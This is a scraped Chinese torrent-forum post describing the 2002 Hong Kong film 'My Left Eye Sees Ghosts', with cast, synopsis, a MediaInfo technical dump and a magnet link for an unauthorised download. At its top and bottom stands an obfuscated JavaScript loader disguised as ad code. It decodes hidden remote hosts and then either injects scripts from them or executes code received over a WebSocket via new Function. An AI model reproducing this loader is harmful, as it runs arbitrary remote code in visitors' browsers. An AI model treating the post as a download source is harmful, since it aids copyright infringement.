我左眼见到鬼[国粤语配音/中文字幕].My.Left.Eye.Sees.Ghosts.2002.1080p.BluRay.x265.10bit.DTS.2Audio 7.39GB

版主小s 19天前 118

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 我左眼见到鬼 / My Left Eye Sees Ghosts

◎年 代 2002

◎产 地 中国香港

◎类 别 喜剧 / 爱情 / 恐怖 / 家庭

◎语 言 粤语

◎上映日期 2002-07-13

◎IMDb链接 https://www.imdb.com/title/tt0319901/

◎豆瓣评分 7.5/10 (64590人评价)

◎豆瓣链接 https://movie.douban.com/subject/1299374/

◎片 长 98分钟

◎导 演 杜琪峰 Johnnie To (id:1160186)

韦家辉 Ka-Fai Wai (id:1017843)

◎编 剧 韦家辉 Ka-Fai Wai (id:1017843)

游乃海 Nai-Hoi Yau (id:1161310)

欧健儿 Kin-Yee Au (id:1303521)

◎演 员 郑秀文 Sammi Cheng (id:1023284)

刘青云 Sean Lau (id:1007251)

应采儿 Cherrie Ying (id:1019372)

李珊珊 San-san Lee (id:1110339)

林雪 Suet Lam (id:1274279)

任达华 Simon Yam (id:1031194)

黄文慧 Man-Wai Wong (id:1330485)

林熙蕾 Kelly Lin (id:1041368)

余袁稳 Yu Yuen Yin (id:1364266)

司马华龙 Wah Lung Szema (id:1379074)

罗雪玲 Elaine Law (id:1426907)

张志平 Chi Ping Chang (id:1364462)

王天林 Tian-lin Wang (id:1041074)

丁云山 Wan San Ding (id:1388181)

杜琪峰 Johnnie To (id:1160186)

韦家辉 Ka-Fai Wai (id:1017843)

黄嘉倩 Cacine Wong (id:1301182)

郑兆强 Siu-keung Cheng (id:1280597)

邱志伟 Chi Wai Yau (id:1301446)

罗永昌 Wing-cheong Law (id:1274489)

余家安 Bruce Yu (id:1301555)

曾伯铨 Steven Tsang (id:1310849)

罗永昌 Wing-cheong Law (id:1274489)

马文现 Stephen Ma (id:1290573)

黄华和 Wah Wo Wong (id:1355706)

◎标 签 香港 / 郑秀文 / 爱情 / 香港电影 / 杜琪峰 / 喜剧 / 刘青云 / 恐怖

◎简 介

何丽珠(郑秀文饰)去加勒比海度假,遇上了一名相貌堂堂知书识礼的男子,虽然才相识7天,二人还是闪电结婚。然而好景不长,男子在潜水中不幸丧生,令何丽珠悲伤万分。

这段闪电的姻缘却没有让丽珠很快地忘掉丈夫。她沉浸在生活的阴影当中,久久不能自拔。一天她竟偶然发现,自己左眼可以见到鬼。

在此之后,丽珠遇见王劲威(刘青云饰)。他自称是丽珠的小学同学,曾经对她非常的倾心。丽珠开始时嫌他麻烦,然而和他相处过程中,却屡屡得到他的帮助劝慰,让她快点医好丈夫逝去的心病。在王劲威要去投胎之前,丽珠想让他找来丈夫,见上一面,然而王劲威没能找回来。

然而,丽珠却慢慢发现,自己的心愿其实并没落空,而且生活的希望也在一点点的回到她的心中。

◎获奖情况 (共2项)

第39届台北金马影展 (2002)

金马奖 最佳女主角(提名)

└──郑秀文 (id:1023284)

金马奖 最佳原创歌曲(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 92425242004699989455781794544867606137 (0x458874412B698F9331044F4F6407FE79)

  4. Complete name : My.Lef[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.39 GiB

  8. Duration : 1 h 37 min

  9. Overall bit rate : 10.8 Mb/s

  10. Movie name : My left eye sees ghosts - Blu-ray?

  11. Encoded date : UTC 2021-10-04 18:07:37

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : WenQuanWeiMiHei-1.ttf / cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 37 min

  23. Bit rate : 8 674 kb/s

  24. Width : 1 916 pixels

  25. Height : 1 080 pixels

  26. Display aspect ratio : 16:9

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.175

  33. Stream size : 5.92 GiB (80%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio #1

  39. ID : 2

  40. ID in the original source medium : 4353 (0x1101)

  41. Format : AC-3

  42. Format/Info : Audio Coding 3

  43. Commercial name : Dolby Digital

  44. Codec ID : A_AC3

  45. Duration : 1 h 37 min

  46. Bit rate mode : Constant

  47. Bit rate : 640 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : L R C LFE Ls Rs

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 31.250 FPS (1536 SPF)

  52. Compression mode : Lossy

  53. Delay relative to video : 83 ms

  54. Stream size : 447 MiB (6%)

  55. Title : Mandarin

  56. Language : Chinese

  57. Service kind : Complete Main

  58. Default : Yes

  59. Forced : No

  60. Original source medium : Blu-ray


  61. Audio #2

  62. ID : 3

  63. Format : DTS

  64. Format/Info : Digital Theater Systems

  65. Codec ID : A_DTS

  66. Duration : 1 h 37 min

  67. Bit rate mode : Constant

  68. Bit rate : 1 510 kb/s

  69. Channel(s) : 6 channels

  70. Channel layout : C L R Ls Rs LFE

  71. Sampling rate : 48.0 kHz

  72. Frame rate : 93.750 FPS (512 SPF)

  73. Bit depth : 24 bits

  74. Compression mode : Lossy

  75. Stream size : 1.03 GiB (14%)

  76. Title : Cantonese

  77. Language : Chinese

  78. Default : No

  79. Forced : No


  80. Text #1

  81. ID : 4

  82. Format : ASS

  83. Codec ID : S_TEXT/ASS

  84. Codec ID/Info : Advanced Sub Station Alpha

  85. Duration : 1 h 33 min

  86. Bit rate : 71 b/s

  87. Count of elements : 1077

  88. Compression mode : Lossless

  89. Stream size : 49.2 KiB (0%)

  90. Title : chs

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No


  94. Text #2

  95. ID : 5

  96. Format : ASS

  97. Codec ID : S_TEXT/ASS

  98. Codec ID/Info : Advanced Sub Station Alpha

  99. Duration : 1 h 33 min

  100. Bit rate : 71 b/s

  101. Count of elements : 1075

  102. Compression mode : Lossless

  103. Stream size : 49.1 KiB (0%)

  104. Title : cht

  105. Language : Chinese

  106. Default : No

  107. Forced : No


  108. Text #3

  109. ID : 6

  110. Format : UTF-8

  111. Codec ID : S_TEXT/UTF8

  112. Codec ID/Info : UTF-8 Plain Text

  113. Duration : 1 h 33 min

  114. Bit rate : 34 b/s

  115. Count of elements : 1073

  116. Stream size : 24.0 KiB (0%)

  117. Title : eng

  118. Language : English

  119. Default : No

  120. Forced : No


  121. Menu

  122. 00:00:00.000 : Chapter 01

  123. 00:02:25.000 : Chapter 02

  124. 00:07:39.125 : Chapter 03

  125. 00:13:37.708 : Chapter 04

  126. 00:17:44.416 : Chapter 05

  127. 00:22:57.208 : Chapter 06

  128. 00:28:36.166 : Chapter 07

  129. 00:32:16.458 : Chapter 08

  130. 00:36:58.083 : Chapter 09

  131. 00:43:22.708 : Chapter 10

  132. 00:50:14.375 : Chapter 11

  133. 00:55:00.750 : Chapter 12

  134. 01:00:23.875 : Chapter 13

  135. 01:03:46.125 : Chapter 14

  136. 01:05:36.291 : Chapter 15

  137. 01:10:38.333 : Chapter 16

  138. 01:14:08.416 : Chapter 17

  139. 01:20:26.000 : Chapter 18

  140. 01:26:50.916 : Chapter 19

  141. 01:32:51.916 : Chapter 20


TAGS 恐怖 喜剧 爱情 家庭

磁力链:
  • magnet:?xt=urn:btih:87C4775A9E4FF3AB7C27EDF228631CB50965F26E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};